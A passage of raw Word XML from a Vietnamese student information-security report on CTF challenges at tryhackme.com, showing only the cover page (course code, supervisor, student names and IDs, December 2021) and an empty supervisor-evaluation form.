              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA59C71" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426F6F58" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480F6A12" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">BÁO CÁO ĐỒ ÁN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12650BFC" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="6300"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>AN TOÀN THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4989750C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="2694"/>
        </w:tabs>
        <w:ind w:left="567" w:right="579" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Đề tài: Tìm hiểu về cuộc thi CTF và giải các thách thức theo các chủ đề trên trang </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="00C97D8D">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>tryhackme.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="395C3789" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="2694"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Mã học phần: 211INSE330380</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB4502" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Giảng viên hướng dẫn: ThS Nguyễn Thị Thanh Vân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E232716" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Sinh viên thực hiện: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F23CC" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lê Văn Cường</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">19110332 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D3AC6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Trần Bảo Duy</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>19110339</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6334ACE6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2410"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5387"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D9CDD7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2410"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5387"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBAAC97" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2410"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5387"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="407BDD85" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2410"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5387"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:sectPr w:rsidR="006F1FD5" w:rsidRPr="00C97D8D">
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="first" r:id="rId12"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1411" w:right="1411" w:bottom="1411" w:left="1411" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>TP. Hồ Chí Minh, tháng 12 năm 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE07C9" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_heading=h.30j0zll" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NHẬN XÉT CỦA GVHD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ADAD5E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9810"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_heading=h.1fob9te" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Về nội dung đề tài và khối lượng thực hiện:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E0D906"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r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F287E8"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r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6054A91E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9810"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Ưu điểm:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8DBEF"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p>
    <w:p w14:paraId="424A3937"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p>
    <w:p w14:paraId="3481C135"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p>
    <w:p w14:paraId="70DDDA01"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p>
    <w:p w14:paraId="0A014AB5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9810"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_heading=h.2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Khuyết điểm:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9BBC6C"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p>
    <w:p w14:paraId="67985DB0"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p>
    <w:p w14:paraId="5B4F1CDA"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p>
    <w:p w14:paraId="0512B0F7"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p>
    <w:p w14:paraId="391B9812" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9810"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4. Đánh giá:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5C80C"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r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF86892"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r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D09EC0" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA" w:rsidP="00652A9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="dot" w:pos="936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p>
    <w:p w14:paraId="1E67134E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="517B2427" wp14:editId="7C26D597">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3771900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>38100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2059305" cy="1495425"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="297" name="Rectangle 297"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="4321110" y="3037050"/>
                          <a:ext cx="2049780" cy="1485900"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="44A6580E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="001F7EFA">
                            <w:pPr>
                              <w:spacing w:before="240"/>
                              <w:jc w:val="center"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>GIẢNG VIÊN</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3C8CF3C4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="06708883" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="001F7EFA">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Nguyễn Thị Thanh Vân</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect w14:anchorId="517B2427" id="Rectangle 297" o:spid="_x0000_s1098" style="position:absolute;left:0;text-align:left;margin-left:297pt;margin-top:3pt;width:162.15pt;height:11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" fillcolor="white [3201]" stroked="f">
                <v:textbox inset="2.53958mm,1.2694mm,2.53958mm,1.2694mm">
                  <w:txbxContent>
                    <w:p w14:paraId="44A6580E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="001F7EFA">
                      <w:pPr>
                        <w:spacing w:before="240"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>GIẢNG VIÊN</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3C8CF3C4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="06708883" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="001F7EFA">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Nguyễn Thị Thanh Vân</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="735C4BDC" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
